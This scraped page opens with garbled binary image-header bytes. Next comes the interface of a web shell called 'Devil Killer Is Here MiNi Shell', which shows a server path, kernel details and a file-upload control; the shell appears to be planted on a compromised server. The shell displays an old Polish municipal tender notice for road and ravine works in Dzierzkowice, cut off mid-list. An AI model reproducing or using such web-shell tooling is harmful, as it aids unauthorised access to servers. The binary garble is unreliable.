JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120418/122694-N-2012.html

<p class="kh_header"><b>Dzierzkowice: Zadanie nr 1 
Utwardzenie dna i odwodnienie wąwozu lessowego w ciągu drogi gminnej zlokalizowanej na działkach o numerach ewidencyjnych 636 i 1127 na odcinkach o długości 600 m w miejscowości Dzierzkowice -  Zastawie    
Zadanie nr 2 
Utwardzenie dna i odwodnienie wąwozu lessowego w ciągu drogi gminnej zlokalizowanej na działce o numerze  ewidencyjnym 551  od km 0+840 do km 1+040 i od km 1+900 do km 2+050 w miejscowości  Dzierzkowice - Wola</b><br>
<b>Numer ogłoszenia: 122694 - 2012; data zamieszczenia: 18.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Dzierzkowice , ul. Terpentynowa 1, 23-251 Dzierzkowice, woj. lubelskie, tel. 081 8221006, faks 081 8221500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 
Utwardzenie dna i odwodnienie wąwozu lessowego w ciągu drogi gminnej zlokalizowanej na działkach o numerach ewidencyjnych 636 i 1127 na odcinkach o długości 600 m w miejscowości Dzierzkowice -  Zastawie    
Zadanie nr 2 
Utwardzenie dna i odwodnienie wąwozu lessowego w ciągu drogi gminnej zlokalizowanej na działce o numerze  ewidencyjnym 551  od km 0+840 do km 1+040 i od km 1+900 do km 2+050 w miejscowości  Dzierzkowice - Wola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1 Dla zadania nr 1
Wykonanie utwardzenia dna wąwozu położonego w ciągu drogi gminnej  w m. Dzierzkowice - Zastawie  poprzez przebudowę drogi biegnącej dnem wąwozu na dwu odcinkach o łącznej długości 0,6 km ( odcinek długości 530 m położony na działce o nr ew. 626 i odcinek długości 70 m położony na działce o nr  ew. 1127 )      
W ramach przedmiotu zamówienia dla zadania nr 1 należy wykonać :
- Roboty przygotowawcze polegające na geodezyjnym wytyczeniu parametrów drogi, odkrzaczeniu skarp na dwu odcinkach  długości łącznej 0,6 km
- roboty ziemne polegające na uformowaniu korpusu drogi , nadania skarpom odpowiedniego pochylenia na dwu odcinkach  długości łącznej 0,6 km
- wykonanie podbudowy zasadniczej z kruszywa łamanego  stabilizowanego mechanicznie na dwu odcinkach o łącznej długości 0,6 km o konstrukcji:
- warstwa dolna grubości  20 cm szerokości 3,80 i 3,30 m o powierzchni łącznej: 2190 m2
- warstwa górna grubości 10 cm szerokości 3,80 i 3,30 m o powierzchni łącznej: 2190 m2
- wykonanie nawierzchni z betonu asfaltowego na dwu odcinkach długości łącznej 0,6  km o konstrukcji:
- warstwa wiążąca   szerokości 3,50 i 3,00 m z betonu asfaltowego o uziarnieniu 0/11,2 ( AC 11W50/70 ) standard II ,  grubości 4 cm,  o powierzchni łącznej: 2010 m2
- warstwa ścieralna  szerokości 3,50 i 3,00 m z betonu asfaltowego o uziarnieniu 0/11,2 ( AC 11S50/70 ) standard II ,  grubości 3 cm,  o powierzchni łącznej: 2010 m2
-  utwardzone poboczy warstwą kruszywa łamanego stabilizowanego mechanicznie grubości 10 cm na dwu odcinkach o łącznej długości 0,6 km  , o łącznej powierzchni 335 m2
-  wykonanie mijanki o konstrukcji jak na odcinku zasadniczym
Główne parametry geometryczne wykonywanych odcinków drogi :
- długość -  0,6 km ( 0,53 km +0,07 km )
-  szerokość podbudowy  - od 3,30 do 3,80 m
-  szerokość podbudowy na mijance  - 4,10 m
-  szerokość jezdni -  3,00 i  3,50  m
-  szerokość jezdni na mijance  : 4,00 m
- szerokość poboczy - 0,25 i 0,50 m
- spadek poprzeczny nawierzchni - 2%  (wklęsły )
- pochylenie skarp - ok. 1: 0,50 

1.2  Dla zadania nr 2
Wykonanie utwardzenia dna wąwozu położonego w ciągu drogi gminnej  w m. Dzierzkowice - Wola poprzez przebudowę drogi biegnącej dnem wąwozu na dwu odcinkach o łącznej długości 0,35  km  położonych na działce o nr ew. 551 , (od km 0+840 do km 1+040 i od km 1+900 do km 2+050)   
W ramach przedmiotu zamówienia dla zadania nr 2 należy wykonać :
- Roboty przygotowawcze polegające na geodezyjnym wytyczeniu parametrów drogi, odkrzaczeniu skarp na dwu odcinkach  długości łącznej 0,35 km
- roboty ziemne polegające na uformowaniu korpusu drogi , nadania skarpom odpowiedniego pochylenia na dwu odcinkach  długości łącznej 0,35 km
- wykonanie podbudowy zasadniczej z kruszywa łamanego  stabilizowanego mechanicznie na dwu odcinkach o łącznej długości 0,35 km o konstrukcji:
- warstwa dolna grubości 15 cm , szerokości 4,30 o powierzchni: 860 m2
- warstwa dolna grubości  20 cm szerokości 4,30 m o powierzchni łącznej: 678  m2
- warstwa górna grubości 10 cm szerokości 4,30 m o powierzchni łącznej: 1538 m2
- wykonanie nawierzchni z betonu asfaltowego na dwu odcinkach długości łącznej 0,6  km o konstrukcji:
- warstwa wiążąca   szerokości 4,00  m z betonu asfaltowego o uziarnieniu 0/11,2 ( AC 11W50/70 ) standard II ,  grubości 4 cm,  o powierzchni łącznej: 1430 m2
- warstwa ścieralna  szerokości 4,00 m z betonu asfaltowego o uziarnieniu 0/11,2 ( AC 11S50/70 )  standard II ,  grubości 3 cm,  o powierzchni łącznej: 1430 m2
-  utwardzone poboczy warstwą kruszywa łamanego stabilizowanego mechanicznie grubości 10 cm na dwu odcinkach o łącznej długości 0,35 km  , o łącznej powierzchni 432,75 m2
-  wykonanie zjazdu długości 10 m szerokości 3,00 m  o konstrukcji jak na odcinku zasadniczym

 1.2.2 Główne parametry geometryczne wykonywanych odcinków drogi :
- długość -  0,35 km ( 0,2 km +0,15 km )
-  szerokość podbudowy  - 4,30 m
-  szerokość jezdni - 4,00 m
- szerokość poboczy - 0,50 m- 0,75 m
- spadek poprzeczny nawierzchni - 2%  (wklęsły )
- pochylenie skarp - ok. 1: 1 

2.  Podstawę wyceny i wykonania przedmiotu zamówienia stanowią:
2.1 Uproszczona dokumentacja  techniczna - zał. do SiWZ  nr 9/1 - zadanie nr 1  i nr 9/2 - zadanie nr 2  
- Opis techniczny robót
- Orientacja
- Przekroje normalne
- Rysunek zjazdu
- Specyfikacja  techniczna wykonania i odbioru robót 
- Przedmiary robót (jako  element pomocniczy) 
2.2  Niniejsza Specyfikacja istotnych warunków zamówienia, wizja w terenie;
3. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej i przedmiarach robót pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji i przedmiarach robót. W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone ww. dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinię. Opinia ta będzie podstawą do podjęcia przez zamawiającego decyzji o akceptacji równoważników lub odrzuceniu ofert z powodu ich nierównoważności.
4. Zaleca się, aby Wykonawca dokonał wizji lokalnej w terenie, gdzie będą realizowane roboty będące przedmiotem zamówienia oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy. Termin wizji lokalnej i szczegóły techniczne jej przeprowadzenia wymagają uzgodnienia z zamawiającym
5. Realizacja przedmiotu zamówienia będzie wykonana w oparciu o obowiązujące przepisy, w szczególności ustawy z dnia 7 lipca 1994r. Prawo budowlane wraz z  przepisami wykonawczymi , oraz zasadami wiedzy technicznej i sztuki budowlanej
6  Materiały użyte przez Wykonawcę powinny odpowiadać, co do jakości, wymogom wyrobów  dopuszczonych do obrotu i stosowania w budownictwie, określonym w art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane  (tekst jedn. Dz. U. z 2010 Nr 243 poz. 1623 ze zm.). 
7. Przedmiary robót załączone do niniejszej SIWZ stanowią jedynie materiał  pomocniczy i nie stanowią zobowiązania stron umowy w sprawie niniejszego zamówienia publicznego - mogą  być niepełne.  Opisy  pozycji przedmiaru nie mogą być traktowane jako ostatecznie definiujące  wymagania   dla danych robot,  
Wykonawca powinien dokonać wizji w terenie, odwołać się do specyfikacji technicznych i obowiązujących przepisów  technicznych, rysunków i opisów w projekcie,   wiedzy technicznej i sztuki budowlanej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielania zamówień uzupełniających, stanowiących nie więcej niż 50% maksymalnej wartości zamówienia i polegających na powtórzeniu tego samego rodzaju zamówień w okresie 3 lat od udzielenia niniejszego zamówienia dotychczasowemu wykonawcy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.30.00-9, 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium. 
2. Zamawiający ustala kwotę wadium na: 10 000,00 zł  ( dziesięć tysięcy złotych  00/100). 
3. Wadium może być wniesione  w jednej lub kilku  następujących formach:
   1) pieniądzu;
   2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że to poręczenie kasy jest zawsze poręczeniem pieniężnym;
   3) gwarancjach bankowych;
   4) gwarancjach ubezpieczeniowych;
   5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. nr 42, poz. 275, z 2008 r. nr 116, poz.730 i 732, nr 227, poz. 1505 oraz  z 2010 r. nr 96, poz. 620).
4. Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy zamawiającego nr. BSZK/o Dzierzkowice   02 8717 1019 2004 4000 0039 0002  w tytule przelewu podać: Przetarg: Nr: ZKD.271.3.2012  Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego.
5. Wadium należy wnieść przed upływem terminu składania ofert.
6. Oferta nie zabezpieczona akceptowaną formą wadium zostanie odrzucona.
7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty  najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została  wybrana jako najkorzystniejsza.  
Wykonawcy, którego oferta została uznana za najkorzystniejsza,  wadium zostanie zwrócone niezwłocznie po zawarciu umowy. Ponadto zamawiający niezwłocznie  zwróci wadium na wniosek wykonawcy, który wycofał fertę przed upływem terminu składania ofert.
8. Oryginał dokumentu wadialnego ma być zdeponowany w Kasie Zamawiającego . Wadium można składać od  poniedziałku do piątku w godz. 8:00-14:00, a w dniu otwarcia ofert od godz. 8:00, (pok. 16, Ip). 
9. Zaleca się, aby do oferty Wykonawca załączył kserokopię wpłaty wadium (w przypadku wniesienia wadium w  formie pieniężnej), w pozostałych przypadkach kopię dokumentu wadialnego. 
UWAGA:
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może je zatrzymać..
Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a ustawy Prawo zamówień publicznych, tj. jeżeli wykonawca w odpowiedzi na wezwanie,  o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych nie złożył dokumentów lub oświadczeń, o   których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw;
2) w art. 46 ust. 5 ustawy Prawo zamówień publicznych, tj.: jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie  Wykonawcy.
Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
Wadium w innej formie niż pieniądz należy złożyć łącznie z ofertą, może być w oddzielnej kopercie .
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych  uprawnień. 
W celu wykazania spełnienia przez Wykonawcę warunku. Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - ( wg wzoru stanowiącego  załącznik nr 4 do niniejszej specyfikacji) 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- udokumentują wykonanie, tj. zakończenie w okresie ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej  w zakresie budowy lub przebudowy  drogi  o konstrukcji:  podbudowa z materiałów kamiennych i  nawierzchnia z  betonu  asfaltowego  na odcinku długości  min.  0,5 km i   wartości   
wykonanych robót co najmniej  350 tys. zł  odpowiednio potwierdzonej, że roboty zostały wykonane zgodnie z  zasadami sztuki budowlanej i prawidłowo ukończone;
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie: potencjału technicznego: Zamawiający nie wyznacza  szczegółowego warunku , oprócz złożenia  oświadczenia o  spełnieniu warunków  udziału w postępowaniu o  zamówienie   publiczne zgodnie z art. 22 ust. 1 ustawy Pzp  ( wg wzoru  stanowiącego  załącznik nr 4 do niniejszej specyfikacji) 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w zakresie: osób zdolnych do wykonania zamówienia: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej  1 osobą  posiadającą uprawnienia budowlane do kierowania  robotami budowlanymi   w specjalności konstrukcyjno- inżynieryjnej  (branża drogowa) posiadającą  co  
najmniej 5 letnie doświadczenie  w  pełnieniu funkcji   kierownika  budowy , posiadającą  aktualny, na dzień składania ofert wpis na listę członków właściwej Izby Samorządu  Zawodowego lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji takiej  osoby  na okres korzystania z nich przy  
wykonywaniu zamówienia: 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy,  określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają środki finansowe lub zdolność kredytową o łącznej kwocie w wysokości co najmniej 350 tys. zł
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

